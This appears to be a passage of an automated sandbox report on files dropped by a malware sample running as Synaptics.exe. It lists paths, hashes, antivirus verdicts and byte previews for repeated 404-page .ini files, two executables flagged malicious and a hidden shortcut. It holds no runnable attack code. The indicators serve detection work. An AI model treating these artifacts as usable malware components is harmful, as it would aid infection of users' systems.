                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Fp5pWOv.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.264699310392705
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+035YDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+YY+pAZewRDK4mW
                                                                                                                                                                                  MD5:0E40F1B3BE2664251A057C3C25F8B40C
                                                                                                                                                                                  SHA1:CF6DDA64F15CAFE718359A496DF91EBA631901E2
                                                                                                                                                                                  SHA-256:E99333046DF17A07F917AE29132218E35857E325FB2F40F81ED003FBB281D8B4
                                                                                                                                                                                  SHA-512:3FC5D03F616AA47D07026A985C07B21B0FF0F5C47377AD0D4D973E9D988E217EC17A63AABAFB94863DFB12E6CF4DC318B7C091262A8B3E3E356AA376FAB5FFF4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jZZUsfKVxcF-KtVNwQ9-lQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\HEaQKbm.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.255533734344521
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+f+pAZewRDK4mW
                                                                                                                                                                                  MD5:DD6782F34D39587DF9A63777FAECA595
                                                                                                                                                                                  SHA1:D3935DE2AC954B7F19372020F25E844EED74450F
                                                                                                                                                                                  SHA-256:34C81BAAE33FFAF55720E9575AF7F203887FACD303DE421ABBDE4CAD946DF5B9
                                                                                                                                                                                  SHA-512:E7D097D9BB845E593BFFAE20F04969BD0C82D4D23E816DC8C05A359CCA68CED2F29E70DB0457CE7D86B5B51C9721324BDD6AFEE270D3ABC7B0D21C7EE18775AC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LeWMoGB--_KAeopU33bojw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Hk28YM9.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.27651127842957
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                  MD5:9E40F5F14B4F270901DA7439511A82A3
                                                                                                                                                                                  SHA1:D5F454B26EDFDE8939F94AEA30D5C32D39BC9A25
                                                                                                                                                                                  SHA-256:E01B891EB7E80E95E7AD94B530E4F2246A0EC1DF87CAE6E629D0B76223F8DE84
                                                                                                                                                                                  SHA-512:1BB1CDC37A212C6503A7BDFDC73DA742CEF271DFE8DBD62A0BADB1DA2398DCCD617693809312B4F66BF6EAB6DBD111B99BF950A099FB911487FCAE5B933B18B1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="u_EXop8B6LA8H-VJffKUSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\JcTixxK.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.259950883259115
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+8+pAZewRDK4mW
                                                                                                                                                                                  MD5:7EE89D6391026DF4F7831C95A0D0D2D3
                                                                                                                                                                                  SHA1:AACB402DE6CA661E9346EDBAF8E25E0668E71B85
                                                                                                                                                                                  SHA-256:7DD1E65FD2E54204988F375A511A39CA731E409D5BC85FC3D522A7CBD5C6C82B
                                                                                                                                                                                  SHA-512:D9F4D96A8ACE8C4B514366AAE9F9D8605BFDFD3FBA2747F24B9BC93D44D9FD16894D44DCBA84CC4E279AF63DFE09523BD30942E1A06FD3A5EB64B0F510F08A69
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JjyestReKDUHk4mbM1FZow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\KrD7UxG.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.266186102482499
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0VbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                  MD5:951AF258DBAE8260C49BB520432A78DE
                                                                                                                                                                                  SHA1:016D5366299873206982A115616B35A7F5F7C077
                                                                                                                                                                                  SHA-256:5CFB033F81E0E29DDB3AD643CF1E51C48379648953DFC6C95815F8DBCA01ACFC
                                                                                                                                                                                  SHA-512:18E5B34B61B754A5D67F36D53529A4F5BC1350B2307E40AA96E00768257448158BA3E2ACF331B85D92C8E3222C52D4CD5271CD6F4CBFCDD894178960BA618D82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8SxTRSHiweffjsq6nN3KTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MTLdFLE.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.266280444801442
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0QDUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+u+pAZewRDK4mW
                                                                                                                                                                                  MD5:73B8E5C9530F9B089BDC0E8BD4C55E82
                                                                                                                                                                                  SHA1:D0CE08FDA40B66BD46CA476A315F83A615EDF44B
                                                                                                                                                                                  SHA-256:910FD2969B0D31D04CE0D720A60310FC30E0397A73516D079CA3D32949FBEC2B
                                                                                                                                                                                  SHA-512:7A93F0FB3987222C12E9377F3E5697B4B63289C27DA6099361100B161C100A398AFA634F233D42E84DC0C74042043BA2A9A281D5A3D2F4EA0DE49A82C0EC9024
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wP5qirZj-ZZ4GN_JY-qUBg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\NDyKofJ.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.264545281101612
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                  MD5:1C68CB7AFAAC18F9B253C9BFAA1A4A77
                                                                                                                                                                                  SHA1:147297220FC5CD3DB80FB9DBFCEDBEF1F7AE957B
                                                                                                                                                                                  SHA-256:B0008F58F98D780737C82F7CB2AACB591AB45B2DA477920166465D49BF4F6B9B
                                                                                                                                                                                  SHA-512:FEA84EE5FA3D51E32322F74BE240DA3D808D5D2AE8EEC20E6CDB8531E5D34ED592C6A7FA4980F282ECD0EB88A317026797C2F8D8FCAE8FD445A58755D4EC4AF8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xLqjLAwnUTWVbmwCR3m4Dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\OBixP3cz.xlsm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18387
                                                                                                                                                                                  Entropy (8bit):7.523057953697544
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\QwRBqv2.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.256244874729158
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0dclISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+sclI+pAZewRDK4mW
                                                                                                                                                                                  MD5:B552D4446D24C0E0360ABDA8E674FA5A
                                                                                                                                                                                  SHA1:88301C130D245EC9B011507B3AF2E12F2F3056DC
                                                                                                                                                                                  SHA-256:51B049D1E454DBC7329297F223F3F507F35BF1D72350C31B4604415576085D64
                                                                                                                                                                                  SHA-512:D68FCB0639B37DF5DCEC8AB31B72A28410A19D740BD919A2F962E96128E1494A5CD3B78BB066D38D8222E81ADB754635C661CB8A40653BE9F1C01B71DFC0BC7C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OZXwLsWdbx9tuEnwWvFN0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RCXDA77.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2262528
                                                                                                                                                                                  Entropy (8bit):7.489402973820276
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:onsHyjtk2MYC5GDqso5AJs+gYGh3JfEwVu4H:onsmtk2a/5AJJcEws4H
                                                                                                                                                                                  MD5:65B8E77E293A905F0AC7289E01DCB715
                                                                                                                                                                                  SHA1:C4326E7DE95466D022BFC4B79D5BC9CC3859DE84
                                                                                                                                                                                  SHA-256:0BC82DCB41571412B308716DB19E9F721A7A304B1BEE76A3B9AFB327B32612F8
                                                                                                                                                                                  SHA-512:167644568729A90BCD31F58D454D9C7182EB167EDE37C818BCC33665AE48249343AFA092937CE8D854D254C975DC98437268C8E51B0ED2C5E7C85A5F1F189108
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\RCXF979.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2262528
                                                                                                                                                                                  Entropy (8bit):7.487265723978036
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:onsHyjtk2MYC5GDzso5AJs+gYGh3JfEwVu4H:onsmtk2aS5AJJcEws4H
                                                                                                                                                                                  MD5:FA4C249127C8D6D3661A369551570EB3
                                                                                                                                                                                  SHA1:BB1FAA2CD5C36DC224BF162B6C7D381F91A49431
                                                                                                                                                                                  SHA-256:4B7D1627FBFEFB6B1E47A2AF6E4EC95A542C219EACA1AEF57949FA76378D65A1
                                                                                                                                                                                  SHA-512:141F2CDE2F424B8883203463AC093B5789A6C2C2B359CA6CF54E9FA8068F91354CC6873DD885CDC92B60D524C9E9080A710036E39764F4931586F38599A32063
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\REi9Htc.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.27105939027754
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0oSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+n+pAZewRDK4mW
                                                                                                                                                                                  MD5:DC79684C67DB88D6BDAD338CC8F33238
                                                                                                                                                                                  SHA1:FCC271B2BD3B132022BC39DA2AD5508BBBFD8D8C
                                                                                                                                                                                  SHA-256:7B3F6C53CDCE17EC2A2F675746B40DD04BC08651D883ECB1FA3A04D13B4D64D4
                                                                                                                                                                                  SHA-512:C5013F45A7B7528F396D55998106CDC8B85E2381928786449B80FA6FEB3E0DEB7F5802D97AF59A1D3CD93BF81A3407FB64CD963E4E0ED7E773C9B235D25EDE6F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WZVRGESBti0-bC3FHIppcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Stopes204.lnk

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                  Entropy (8bit):3.026195870563083
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:8wl0ksXou41w/tz+7RafgKDDAl2RW3MvW3ME3qQ18/3NJkKAd4t2Y+xIBjK:8jf4eaRMgKXOftHLS9HAv7aB
                                                                                                                                                                                  MD5:CC1F1A79320338AFABD0947DE0744BCD
                                                                                                                                                                                  SHA1:53780A426BE2BCA09043E5EEB1AEBC4651FAC0F6
                                                                                                                                                                                  SHA-256:2AE7C3D23C798A2CA5B95AE8957F0BF23A83E8613E165526986123500F69BCF3
                                                                                                                                                                                  SHA-512:78017EF850E40D49CE5C2B459CEB101E30647619EDD0F68E9A44B7E2EB098621B973A6514F474239C695565D42700ABED6C35A3BDCD4A5B3BA029E9BE29BA8AC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L..................F........................................................7....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................h.a.r.d.z.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....t.2...........Dansehesten98.exe.T............................................D.a.n.s.e.h.e.s.t.e.n.9.8...e.x.e... .......\.D.a.n.s.e.h.e.s.t.e.n.9.8...e.x.e.!.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\U5UjEkM.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.255451488331643
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0ErSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+7+pAZewRDK4mW
                                                                                                                                                                                  MD5:FD58B50DF74A98E3CE307B686FF10A1F
                                                                                                                                                                                  SHA1:3BB2373822783BB728FC46C377368116D3688DF3
                                                                                                                                                                                  SHA-256:358BB4E4BC103F18FE910C9AC6EA0475D278CE1AE607F939E366F32A98B348EB
                                                                                                                                                                                  SHA-512:29C5415E00C2C4F5B69DDA03DE1B5F5D53777CBD79685F1EBAADB79ABC6C46CE6CF5E704A06AC54C0883C1D1D1C3DA497ACCA5130E0263232937F2B0BD262E48
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IAtR19I5J4MsLp-m-Bw-7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\WGLMqHD.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
